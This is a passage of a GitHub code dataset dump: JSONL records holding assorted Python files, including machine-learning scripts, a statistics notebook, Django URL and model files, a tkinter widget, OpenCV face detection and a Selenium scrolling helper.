0.001)\n","repo_name":"kdberends/dotter","sub_path":"tests/test_hydraulics.py","file_name":"test_hydraulics.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"9712132913","text":"import sys\nimport json\nfrom model import SalesPredictionLSTM\nfrom data_utils import load_timeseries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ntrain_file = \"data/sales.csv\"\nwindow_size = 6\ntrain_test_split = 0.8\n(\n x_train, y_train, x_test, y_test,\n x_test_raw, y_test_raw,\n last_window_raw, last_window\n) = load_timeseries(train_file, window_size, train_test_split)\n\nmodel = SalesPredictionLSTM(\n layers=[window_size, 100, 100, 1],\n dropout=0.2,\n batch_size=100,\n epochs=100,\n validation_split=0.1\n)\n\nmodel.build_model()\n\nmodel.train(x_train, y_train)\nmodel.save_weights('weights.h5')\n","repo_name":"sushantMoon/isi-nna","sub_path":"assignment7/server-train.py","file_name":"server-train.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"29556550837","text":"# This is the first cell with code: set up the Python environment\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\nfrom scipy.stats import binom\nimport pandas as pd\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import clear_output, display, HTML\n\ndef binoLowerCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Lower confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n lo = 0.0\n if (x > 0):\n f = lambda q: cl - scipy.stats.binom.cdf(x-1, n, q)\n lo = sp.optimize.brentq(f, 0.0, p, xtol=inc)\n return lo\n\ndef binoUpperCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Upper confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n hi = 1.0\n if (x < n):\n f = lambda q: scipy.stats.binom.cdf(x, n, q) - (1-cl)\n hi = sp.optimize.brentq(f, p, 1.0, xtol=inc) \n return hi\n\n# Population of two values, {0, 1}, in various proportions. Amounts to Binomial random variable\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([.001, .01, 0.1]) # mixture fractions, proportion of 1s in the population\nalpha = 0.05 # 1- (confidence level)\nreps = int(1.0e3) # just for demonstration\nvals = [0, 1]\n\nsimTable = pd.DataFrame(columns=('fraction of 1s', 'sample size', 'Student-t cov', 'Binom cov', 'Student-t len', 'Binom len'))\nfor p in ps:\n popMean = p\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1.0-alpha/2, df=n-1)\n samMean = np.zeros(reps)\n sam = sp.stats.binom.rvs(n, p, size=reps)\n samMean = sam/float(n)\n samSD = np.sqrt(samMean*(1-samMean)/(n-1))\n coverT = (np.fabs(samMean-popMean) < tCrit*samSD).sum()\n aveLenT = 2*(tCrit*samSD).mean()\n coverB = 0\n totLenB = 0.0\n for r in range(int(reps)): \n lo = binoLowerCL(n, sam[r], cl=1.0-alpha/2)\n hi = binoUpperCL(n, sam[r], cl=1.0-alpha/2)\n coverB += ( p >= lo) & (p <= hi)\n totLenB += hi-lo\n simTable.loc[len(simTable)] = p, n, str(100*float(coverT)/float(reps)) + '%', str(100*float(coverB)/float(reps)) + '%', str(round(aveLenT,4)), str(round(totLenB/float(reps),4))\n#\nansStr = 'Simulated coverage probability and expected length of Student-t and Binomial confidence intervals for a {0, 1} population ' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '% .Estimated from ' + str(int(reps)) + ' replications. 
'\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\n# Nonstandard mixture: a pointmass at zero and a uniform[0,1]\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([0.9, 0.99, 0.999]) # mixture fraction, weight of pointmass\nthresh = [0.2, 0.1, 0.01, .001]\nalpha = 0.05 # 1- (confidence level)\nreps = 1.0e3 # just for demonstration\n\ncols = ['mass at 0', 'sample size', 'Student-t cov']\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' cov')\ncols.append('Student-t len')\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' len')\n\n\nsimTable = pd.DataFrame(columns=cols)\n\nfor p in ps:\n popMean = (1-p)*0.5 # p*0 + (1-p)*.5\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1-alpha, df=n-1)\n coverT = 0 # coverage of t intervals\n tUp = 0 # mean upper bound of t intervals\n coverB = np.zeros(len(thresh)) # coverage of binomial threshold intervals\n bUp = np.zeros(len(thresh)) # mean upper bound of binomial threshold intervals\n for rep in range(int(reps)):\n sam = np.random.uniform(size=n)\n ptMass = np.random.uniform(size=n)\n sam[ptMass < p] = 0.0\n samMean = np.mean(sam)\n samSD = np.std(sam, ddof=1)\n tlim = samMean + tCrit*samSD\n coverT += (popMean <= tlim) # one-sided Student-t\n tUp += tlim\n for i in range(len(thresh)):\n x = (sam > thresh[i]).sum() # number of binomial \"successes\"\n pPlus = binoUpperCL(n, x, cl=1-alpha)\n blim = thresh[i]*(1.0-pPlus) + pPlus\n coverB[i] += (popMean <= blim)\n bUp[i] += blim\n theRow = [p, n, str(100*float(coverT)/float(reps)) + '%']\n for i in range(len(thresh)):\n theRow.append(str(100*float(coverB[i])/float(reps)) + '%')\n theRow.append(str(round(tUp/float(reps), 3)))\n for i in range(len(thresh)):\n theRow.append(str(round(bUp[i]/float(reps), 3)))\n simTable.loc[len(simTable)] = theRow\n#\nansStr = 'Simulated coverage probability and expected lengths of one-sided Student-t confidence intervals and threshold ' + 'Binomial intervals for mixture of U[0,1] and pointmass at 0 ' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '% . Estimated from ' + str(int(reps)) + ' replications. '\n\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\nget_ipython().run_line_magic('run', 'talkTools.py')\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/binom.py","file_name":"binom.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"44714386104","text":"from __future__ import division\nimport math\nimport sys\nif sys.version_info.major > 2:\n import tkinter as tk\nelse:\n import Tkinter as tk\n\nfrom .. import tkutil as tku\n\ntorads = math.pi / 180\ndef hit(x, y, tx, ty, vx, vy):\n \"\"\"Calculate hit point given x, y of a corner.\"\"\"\n if not vx:\n mul = (ty-y) / vy\n elif not vy:\n mul = (tx-x) / vx\n else:\n mulx = (tx-x) / vx\n muly = (ty-y) / vy\n mul = muly if abs(mulx) > abs(muly) else mulx\n return x + vx*mul, y + vy*mul\n\nclass Crosshairs(object):\n \"\"\"Crosshairs on mouse.\"\"\"\n TAG = '_crosshair'\n def __init__(self, master):\n self._vec = (1, 0)\n self.idns = [\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0)]\n for idn in self.idns:\n master.addtag(self.TAG, 'withtag', idn)\n for idn in self.idns[::2]:\n master.addtag('_crossh', 'withtag', idn)\n for idn in self.idns[1::2]:\n master.addtag('_crossv', 'withtag', idn)\n master.itemconfigure(self.TAG, state='disabled')\n for idn in self.idns[:2]:\n master.addtag('_crossb', 'withtag', idn)\n master.itemconfigure(idn, fill='black', width=3)\n for idn in self.idns[2:]:\n master.addtag('_crossf', 'withtag', idn)\n master.itemconfigure(idn, fill='white', width=1)\n tag = 'CanvasCrosshairs'\n if tag not in master.bindtags():\n tku.subclass(master, tag)\n if not master.bind_class(tag):\n tku.add_bindings(master, tag, tupit=tku.memberit(self))\n master.configure(cursor='none')\n\n def angle(self, angleorvx, vy=None, degrees=True):\n \"\"\"Set the crosshairs angle.\n\n angleorvx: angle (if vy is None) else vector x direction\n vy: if given, then the crosshair direction is (angleorvx, vy)\n degrees: if vy is None, is angleorvx in degrees or radians.\n \"\"\"\n if vy is None:\n if degrees:\n angle = (angleorvx % 90) * torads\n else:\n angle = angleorvx % (math.pi / 4)\n self._vec = (math.cos(angle), math.sin(angle))\n else:\n vx = angleorvx\n if vx * vy > 0:\n self._vec = abs(vx), abs(vy)\n else:\n if not (vx or vy):\n self._vec = (1, 0)\n else:\n self._vec = abs(vy), abs(vx)\n\n @tku.Bindings('', '')\n @classmethod\n def toggle(cls, widget):\n if widget.itemcget(cls.TAG, 'state') == 'disabled':\n widget.itemconfigure(cls.TAG, state='hidden')\n else:\n widget.itemconfigure(cls.TAG, state='disabled')\n\n @tku.Bindings('')\n @classmethod\n def show(cls, widget, x, y):\n widget.itemconfigure(cls.TAG, state='disabled')\n Crosshairs.draw_crosshairs(widget, x, y)\n\n @tku.Bindings('')\n @classmethod\n def hide(cls, widget):\n widget.itemconfigure(cls.TAG, state='hidden')\n\n @tku.Bindings('')\n @staticmethod\n def draw_crosshairs(widget, x, y):\n l, t = widget.xy(0,0)\n r, b = l+widget.winfo_width(), t+widget.winfo_height()\n x, y = widget.xy(x, y)\n self = widget.crosshairs\n i1, i2, i3, i4 = self.idns\n vx, vy = self._vec\n if vy:\n x1, y1 = hit(x, y, l, t, -vx, -vy)\n x2, y2 = hit(x, y, r, b, vx, vy)\n widget.coords(i1, x1, y1, x2, y2)\n widget.coords(i3, x1, y1, x2, y2)\n x1, y1 = hit(x, y, r, t, -vy, vx)\n x2, y2 = hit(x, y, l, b, vy, -vx)\n widget.coords(i2, x1, y1, x2, y2)\n widget.coords(i4, x1, y1, x2, y2)\n else:\n widget.coords(i1, l, y, r, y)\n widget.coords(i3, l, y, r, y)\n widget.coords(i2, x, t, x, b)\n widget.coords(i4, x, t, x, 
b)\n\n","repo_name":"j-hsiao/py-labeler","sub_path":"jhsiao/labeler/crosshairs.py","file_name":"crosshairs.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"2148070739","text":"import arff, numpy as np\nimport pandas as pd\nimport sys\n\n# input arguments:\nif len(sys.argv) != 3:\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\nfor arg in sys.argv:\n if arg == '-h' or arg == '--help':\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\n\nin_file = sys.argv[1]\nout_file = sys.argv[2]\n\ndataset = arff.load(open(in_file))\ndata = np.array(dataset['data'],dtype=np.float64)\nheader = np.array(dataset['attributes'])[:, 0]\n\nmols = []\nwith open(in_file, 'r') as iFile:\n for a in iFile:\n if a[:15] =='% NAME OF MOLEC':\n mol_id = a.strip().split(' ')[-1]\n mols.append(mol_id)\n\nfinal_df = pd.DataFrame(data, columns=header)\nfinal_df.index = mols\nfinal_df.dropna(axis=1, inplace=True)\nfinal_df.index.name = 'Id'\n# Add mean values for Na3VO4\nfinal_df.loc['EOS100042'] = final_df.mean()\nsys.stdout.write(f\"added mean values for EOS100042 (Na3VO4)\\n\")\nfinal_df.to_csv(out_file)\nsys.stdout.write(f\"Shape: {final_df.shape}\\n\")\n\n","repo_name":"knawel/EUOS-SLAS","sub_path":"data/arff_to_csv.py","file_name":"arff_to_csv.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4139316401","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 01:47:14 2019\n\n@author: Mr.Reliable\n\"\"\"\n\n#https://www.nowcoder.com/practice/ab900f183e054c6d8769f2df977223b5?tpId=90&tqId=30789&tPage=1&rp=1&ru=%2Fta%2F2018test&qru=%2Fta%2F2018test%2Fquestion-ranking\n\n\"\"\"\n牛牛又从生物科研工作者那里获得一个任务,这次牛牛需要帮助科研工作者从DNA序列s中找出最短没有出现在DNA序列s中的DNA片段的长度。\n例如:s = AGGTCTA\n序列中包含了所有长度为1的('A','C','G','T')片段,但是长度为2的没有全部包含,例如序列中不包含\"AA\",所以输出2。\n\n输入:输入包括一个字符串s,字符串长度length(1 ≤ length ≤ 2000),其中只包含'A','C','G','T'这四种字符\n输出:输出一个正整数,即最短没有出现在DNA序列s中的DNA片段的长度。\n\neg:\nAGGTCTA\n2\n\n\"\"\"\ns = input().strip()\n#print(len(s))\nfor i in range(6):\n if 4**i <= len(s) <4**(i+1):\n k = i+1\n \n \ntmp_1 = []\nfor j in range(k):\n tmp = []\n for m in range(len(s)-j):\n tmp.append(s[m:m+j+1])\n se = set(tmp)\n if len(se) < 4**(j+1):\n tmp_1.append(j+1)\n \nprint(tmp_1[0])","repo_name":"alpharol/algorithm_python3","sub_path":"nowcoder/0014.DNA序列.py","file_name":"0014.DNA序列.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"38466301498","text":"\"\"\"begin URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, re_path,include\nfrom .views import (\n\thome_page,\n\tcontact_page,\n\tabout_page,\n\tsmile_page,\n login_page,\n register_page,\n logout_view,\n gallery_page, \n set_timezone,\n\t)\nfrom account.views import (\n account_info_view,\n # account_update_info_view,\n user_profile,\n profile_page,\n account_detail_info_view,\n profile_create_view,\n )\nfrom blog.views import blog_post_create_view\nfrom searches.views import search_view \nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',home_page),\n re_path(r'^page/$',about_page),\n re_path(r'^pages/$',about_page),\n re_path(r'^about/$',about_page),\n path('contact/',contact_page),\n path('blog-new/',blog_post_create_view),\n path('blog/',include('blog.urls')), #by proving include('blog.urls') we give the location of the content that we have\n path('smile/',smile_page),\n path('search/',search_view),\n path('login/',login_page),\n path('logout/',logout_view),\n path('register/',register_page),\n path('avatar/',include('avatar.urls')),\n path('timezone/',set_timezone),\n path('account/',include('account.urls')),\n path('account-create/',profile_create_view),\n path('gallery/',gallery_page),\n # path('user-profile/',user_profile),\n # path('account-detail//',account_detail_info_view),\n # path('account-update/',account_update_info_view)\n]\n\nif settings.DEBUG:\n #TEST MODE\n from django.conf.urls.static import static\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"askhatov/Ask-blog","sub_path":"begin/begin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34223773375","text":"# Reference\n# https://docs.opencv.org/4.0.1/d6/d0f/group__dnn.html\n\nimport cv2\nimport imutils\nfrom imutils.video import WebcamVideoStream\n\n# Load the model\nnet = cv2.dnn.readNet('../model/face-detection-adas-0001.xml', '../model/face-detection-adas-0001.bin') \n\n# Specify target device\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\n\n# Read the Camera\nvs = WebcamVideoStream(src=0).start()\n\nwhile True:\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=600)\n\n\n # Prepare input blob and perform an inference\n blob = cv2.dnn.blobFromImage(frame, size=(672, 384), ddepth=cv2.CV_8U) \n\n net.setInput(blob) \n\n out = net.forward()\n\n # Draw detected faces on the frame\n for detection in out.reshape(-1, 7): \n\n confidence = float(detection[2]) \n\n xmin = int(detection[3] * frame.shape[1]) \n ymin = int(detection[4] * frame.shape[0]) \n\n xmax = int(detection[5] * frame.shape[1]) \n ymax = int(detection[6] * frame.shape[0])\n\n if confidence > 0.5:\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))\n \n cv2.imshow(\"Frame\", frame)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()","repo_name":"HsinM/OpenVINO-NCS","sub_path":"pi_code/face/code/webcam_test.py","file_name":"webcam_test.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"42230743988","text":"\nfrom .base_strategy import BaseStrategy\n\nclass SAR(BaseStrategy):\n NAME = 'sar'\n # Feature, Bias, Scaler\n FEATURES = [\n ['sar_bias', 0, 5],\n ['sar_diff', 0, 30],\n ['sar_diff_pre', 0, 30],\n ['change', 0, 10],\n ['amp_0105', 0, 2],\n ['amp_0510', 0, 1],\n ]\n DNA_LEN = len(FEATURES)*2\n","repo_name":"hellojixian/stock-ai","sub_path":"lib/indicators/sar.py","file_name":"sar.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"}
+{"seq_id":"44074281615","text":"import requests\n\napi_base = 'https://icanhazdadjoke.com/'\n\nheaders = {'accept': 'application/json'}\n\nprint('---------HERE ARE 10 JOKES HAHAHAHA------------')\nfor x in range(10):\n response = requests.get(api_base, headers)\n\n if response.status_code == 200:\n resp_as_json = response.json()\n print(resp_as_json['joke'])\n else:\n print('Oops... didn\\'t work')\n","repo_name":"cecilphillip/python-stream","sub_path":"src/dadjokes.py","file_name":"dadjokes.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"}
+{"seq_id":"29533268887","text":"import numpy as np\nnp.random.seed(1)\nimport sys\n\ndef relu(x):\n return (x>0)*x\n\ndef relu2deriv(output):\n return (output>0)\n\n# Input data\n\nalpha,iterations=(0.1,100)\npixels_per_image,num_labels,hidden_size=(784,10,100)\n\nweights_0_1=0.2*np.random.random((pixels_per_image,hidden_size))-0.1\nweights_1_2=0.2*np.random.random((hidden_size,num_labels))-0.1\n\nfor j in xrange(iteratins):\n error=0\n correct_cnt=0\n for i in xrange(len(images)/batch_size):\n batch_start,batch_end=((i*batch_size),((i+1)*batch_size))\n layer_0=images[batch_start:batch_end]\n layer_1=relu(np.dot(layer_0,weights_0_1))\n dropout_mask=np.random.randint(2,size=layer_1.shape)\n layer_1*=dropout_mask\n layer_2=np.dot(layer_1,weights_1_2)\n \n error+=np.sum((labels[batch_start:batch_end]-layer_2)**2)\n \n for k in xrange(batch_size):\n correct_cnt+=int(np.argmax(layer_2[k:k+1])==np.argmax(labels[batch_start+k:batch_start+k+1]))\n \n delta_layer_2=(layer_2-labels[batch_start:batch_end])/batch_size\n delta_layer_1=delta_layer_2.dot(weights_1_2.T)*relu2deriv(layer_1)\n \n delta_layer_1*=dropout_mask\n \n weights_1_2-=alpha*layer_1.T*dot(delta_layer_2)\n weights_0_1-=alpha*layer_0.T*dot(delta_layer_1)\n \n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/4. Batch Gradient Descent.py","file_name":"4. Batch Gradient Descent.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20700099591","text":"import os\nimport sys\nimport csv\n\n\ndef fileAccess():\n\twith open('test.txt') as f:\n\t\tfor line in f:\n\t\t\tprint(line.strip())\n\n\tprint('-------------------------------------------------------------------')\n\n\twith open('test2.csv') as cf:\n\t\treader = csv.reader(cf, delimiter=' ')\n\t\twith open('test3.csv', 'w') as cf2:\n\t\t\twriter = csv.writer(cf2, delimiter=' ')\n\t\t\tfor row in reader:\n\t\t\t\twriter.writerow([row[1]])\n\t\n\t\ndef main():\n fileAccess()\n\nif __name__ == '__main__':\n main()\t\n","repo_name":"ShashwathKumar/PythonTests","sub_path":"JARVIS/fileWrites/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41559602437","text":"# Name: Basemaps\n# Author: Marios S. Kyriakou, KIOS Research and Innovation Center of Excellence (KIOS CoE)\n# Email: mariosmsk@gmail.com\n# License: MIT\n\n# This plugin works with EPANET MTP4r2:\n# https://github.com/USEPA/SWMM-EPANET_User_Interface/releases/tag/MTP4r2\nimport os\n\nplugin_name = \"Basemaps\"\nplugin_create_menu = True\n__all__ = {\"Google Satellite\":1, \"Openstreetmap\":2}\n\n\ndef checkBasemaps(session, mapname):\n status = True\n for tlayer in session.map_widget.base_group.findLayers():\n if tlayer.layer().name() == mapname:\n session.map_widget.remove_layers([tlayer.layer()])\n session.map_widget.base_group.removeChildNode(tlayer)\n status = False\n break\n return status\n\ndef run(session=None, choice=None):\n\n path = os.getcwd() + \"\\\\plugins\\\\Basemaps\\\\\"\n if choice is None:\n choice = 99\n if choice == 1:\n mapname = \"Google Satellite.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n elif choice == 2:\n mapname = \"Openstreetmap.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n if choice ==1 or choice == 2:\n urlWithParams = path + mapname\n session.map_widget.addRasterLayer(urlWithParams)\n session.map_widget.refresh_extent_needed = False\n","repo_name":"ppavlo02/EPANET-Plugins","sub_path":"Basemaps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"9729459135","text":"import numpy as np\nfrom nbayes2 import *\nimport timeit\n\n# def cmp_NaiveBayes():\ndata = np.genfromtxt('vote_filled.tsv', dtype = int)\nX = data[:, :-1]\ny = data[:, -1]\n\nclr1 = NaiveBayes1()\nclr1.fit(X, y)\nprint(clr1.fit(X, y))\n\nclr2 = NaiveBayes2()\nclr2.fit(X, y)\nprint(clr2.fit(X, y))\n\n# if __name__ == '__main__':\n\n## timeit setups ( 100 hundred exe)\nprint(timeit.timeit(\"print('ie-i')\", setup=\"print('Start timeit')\", number = 100))\nprint(\"NaiveBayes1 = \", timeit.timeit(NaiveBayes1))\nprint(\"NaiveBayes2 = \", timeit.timeit(NaiveBayes2))\n# print(timeit.timeit(clr1.fit(X, y)))\n# print(timeit.timeit(clr2.fit(X, y)))\n","repo_name":"jusui/Data_Science","sub_path":"ML_algorithm/nbayes_1/cmp_NaiveBayes.py","file_name":"cmp_NaiveBayes.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"28426454932","text":"\"\"\" \r\nUzrakstiet programmu, kas ielasa skaitli (kā float) -\r\nriņķa līnijas rādiusu un izvada uz ekrāna (print) \r\nriņķa līnijas garumu un laukumu, atbilstoši noformējot atbildi.\r\nPārbaudiet programmas darbību ar dažādiem ievaddatiem.\r\n\"\"\"\r\n\r\nrādius=float(input(\"Ievadi rādiusu!\"))\r\n\r\nlaukums=3.14*(rādius*rādius)\r\nlinijas_garums=2*3.14*rādius\r\n\r\nprint(\"Riņķa laukums ir:3\",laukums)\r\nprint(\"Riņķa līnijas garums ir:\",linijas_garums)","repo_name":"elinaavintisa/praktikums_Python","sub_path":"uzd1.py","file_name":"uzd1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"lv","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"35489474866","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nGET_WINDOW_YOFFSET_SCRIPT = \"return window.pageYOffset;\"\n\n\ndef configure_driver(path: str, is_headless: bool = True) -> WebDriver:\n \"\"\"\n Creates a Chrome WebDriver instance.\n\n :param path: Path to the Chrome WebDriver executable\n :param is_headless: Specifies whether to run the driver in headless mode\n :return: A Chrome WebDriver instance\n \"\"\"\n chrome_options = Options()\n chrome_options.headless = is_headless\n driver = webdriver.Chrome(executable_path=path, options=chrome_options)\n\n return driver\n\n\ndef scroll_down(driver: WebDriver):\n \"\"\"\n Scrolls the webpage down from the current Y position\n\n :param driver: The Chrome WebDriver instance\n \"\"\"\n scroll_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n scroll = scroll_pos + 250\n driver.execute_script(\"window.scrollTo(0, \" + str(scroll) + \");\")\n\n # Wait for scroll to execute\n time.sleep(.5)\n\n\ndef scroll_until_find_by_class_name(class_name: str, driver: WebDriver, parent=None):\n \"\"\"\n Looks for an WebElement object by class name by scrolling down the entire webpage.\n If a parent WebElement is provided it will only search through its children WebElements.\n\n :param class_name: The WebElement class name to search for.\n :param driver: The Chrome WebDriver instance\n :param parent: (Optional) A Parent WebElement object\n :return: A WebElement object matching the given class name or None if no WebElement was found.\n \"\"\"\n # Start at top of screen\n driver.execute_script(\"window.scrollTo(0, 0);\")\n time.sleep(1)\n last_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n\n element = None\n while element is None:\n try:\n if parent is None:\n element = driver.find_element(By.CLASS_NAME, class_name)\n else:\n element = parent.find_element(By.CLASS_NAME, class_name)\n except NoSuchElementException:\n scroll_down(driver)\n new_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n if last_pos != new_pos:\n last_pos = new_pos\n else:\n return None\n return element\n","repo_name":"Nicholas-C-Brown/COSC419F-Project","sub_path":"src/helper_methods/driver_helper.py","file_name":"driver_helper.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"1058343667","text":"class CapturedPacket:\n\tdef __init__(self, number, id, type, xfer_type, epnum, devnum, busnum, setup, length, data):\n\t\tself.number = number\n\t\tself.id = id\n\t\tself.type = type\n\t\tself.xfer_type = xfer_type\n\t\tself.epnum = epnum\n\t\tself.devnum = devnum\n\t\tself.busnum = busnum\n\t\tself.setup = setup\n\t\tself.length = length\n\t\tself.data = data\n","repo_name":"aib/usb-pcap","sub_path":"usb_pcap/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"24688780479","text":"import datetime\n\nimport requests\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\n\nfrom fishingbs.accounts.models import Profile\nfrom fishingbs.accounts.validators import image_max_size_validator\nfrom fishingbs.mixins import mixins as get\n\n\nUserModel = get_user_model()\n\n\nclass GiveInformationModel(models.Model):\n FISH_TYPES = get.get_fish_types()\n LOCATIONS = get.get_locations_for_news()\n INTENSITIES = get.get_intensities()\n CATCHING_TYPES = get.get_catching_types()\n MAX_LENGTH_FISH_TYPES = get.get_max_length_of_a_sequence(FISH_TYPES)\n MAX_LENGTH_LOCATIONS = get.get_max_length_of_a_sequence(LOCATIONS)\n MAX_LENGTH_INTENSITIES = get.get_max_length_of_a_sequence(INTENSITIES)\n MAX_LENGTH_CATCHING_TYPES = get.get_max_length_of_a_sequence(CATCHING_TYPES)\n\n fish_type = models.CharField(\n max_length=MAX_LENGTH_FISH_TYPES,\n choices=FISH_TYPES,\n blank=False,\n null=False,\n )\n location = models.CharField(\n max_length=MAX_LENGTH_LOCATIONS,\n choices=LOCATIONS,\n blank=False,\n null=False,\n )\n intensity = models.CharField(\n max_length=MAX_LENGTH_INTENSITIES,\n choices=INTENSITIES,\n blank=False,\n null=False,\n )\n last_most_intense = models.TimeField(\n default=datetime.datetime.now,\n blank=False,\n null=False,\n )\n type_of_catching = models.CharField(\n max_length=MAX_LENGTH_CATCHING_TYPES,\n choices=CATCHING_TYPES,\n blank=False,\n null=False,\n )\n photo = models.ImageField(\n upload_to='catches/',\n validators=[\n image_max_size_validator,\n ],\n blank=True,\n null=True,\n )\n comment = models.TextField(\n max_length=1500,\n blank=True,\n null=True,\n )\n created_on = models.DateTimeField(\n auto_now_add=True,\n )\n from_user = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n blank=False,\n null=False,\n default=1,\n )\n\n","repo_name":"Lasabito/fishing_bs","sub_path":"fishingbs/fishingbs/news/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
